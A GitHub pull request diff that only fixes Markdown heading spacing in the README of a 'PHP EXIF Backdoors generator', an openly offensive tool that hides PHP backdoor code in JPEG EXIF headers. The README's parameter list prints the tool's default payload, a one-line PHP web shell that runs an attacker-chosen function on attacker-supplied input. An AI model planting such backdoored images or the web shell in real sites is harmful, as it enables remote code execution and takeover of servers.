Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 4 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -17,22 +17,22 @@ PHP EXIF Backdoors generator using custom shellcode
* __Website__ : [Cyber Security Research Center from Romania](http://ccsir.org)
* __Contact__ : contact [at] ccsir [dot] org

##Usage
## Usage
> php phpeb.php [params]

##Params
## Params
* -i path_to_image.jpg
* -o path_to_backdoored_image.jpg
* -s shellcode (optional)
* -h EXIF headers (N/A in v1.0, Default:Make,Model)
* -v verbose 1 or 0(optional, Default:0)
* Default: !empty(\$1=@\$_GET[1]) && \$1(\$_GET[2]);

##Help
## Help
- No need. Just download these files and upload in an environment that supports PHP. You can send any feedback
or questions to contact [at] ccsir [dot] org

##License
## License

Copyright (C) 2013 Cyber Security Research Center from Romania

Expand Down